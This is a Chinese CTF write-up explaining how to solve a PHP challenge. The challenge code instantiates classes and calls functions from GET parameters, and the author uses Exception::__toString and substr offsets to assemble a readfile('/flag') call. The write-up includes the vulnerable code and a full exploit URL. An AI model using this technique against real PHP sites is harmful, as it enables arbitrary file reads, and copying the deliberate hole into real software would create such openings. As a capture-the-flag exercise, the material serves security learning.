PHP Exception CTF题目

admin

140350
文章

117
评论

2022年11月22日12:56:12评论273 views字数 1049阅读3分29秒阅读模式

PHP Exception CTF题目

扫一扫关注公众号，长期致力于安全研究 PHP Exception CTF题目

前言：这是前段时间打的一场比赛

0x01 解题思路

首先代码如下，关键点就在于这几行。其实就是通过substr来截取字符串并在最后一行当做函数来调用

$class = new $a($b);

$str1 = substr($class->$c(),$d,$e);

$str2 = substr($class->$c(),$f,$g);

$str1($str2);

<?php
error_reporting(0);show_source(__FILE__);
Class Hello{
    public $filename;    public $contents;
    public function __construct(){        $this->filename = "hint.php";        $this->contents = "you guess";    }
    public function fileread(){        echo "keep going";    }}
$a = $_GET["a"];$b = $_GET["b"];$c = $_GET["c"];$d = $_GET["d"];$e = $_GET["e"];$f = $_GET["f"];$g = $_GET["g"];
if(preg_match("/Error|ArrayIterator|Exception/i", $c)) {    die("hello");}
$class = new $a($b);$str1 = substr($class->$c(),$d,$e);$str2 = substr($class->$c(),$f,$g);$str1($str2);?>

那需要截取什么字符串呢？这里就使用Exception中的_toString方法来回显信息，因为在34行中有substr来切割字符串、

PHP Exception CTF题目

本地通过print打印出现了回显，而Exception: 则是起始位置，readfile是8个位置，所以

$str1 = substr($class->$c(),$d,$e);的d是11 e是8，这样就截取到了readfile这个字符串

所以现在的坐标是19

$str2 = substr($class->$c(),$f,$g); f则为19，g是/flag的长度为5

现在$str1为readfile $str2为

http://xxxxx/?a=Exception&b=readfile/flag&c=__toString&d=11&e=8&f=19&g=5

这样flag就出来了

PHP Exception CTF题目

~.~

PHP Exception CTF题目

原文始发于微信公众号（HACK安全）：PHP Exception CTF题目

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

PHP Exception CTF题目

【CTFer成长之路】反序列化漏洞

【CTFer成长之路】XSS的魔力

CTF - Pwn题之shellcode&栈迁移

第二届长城杯信息安全铁人三项赛（防护赛）总决赛-逆向题解

ACTF 2025 writeup by Mini-Venom

2025蓝桥杯WP（LRT）

UKFC2024 ACTF WP

ACTF 2025 Writeup by Nepnep

流量分析 - No11(解)

Web3互联网取证-2025FIC晋级赛

发表评论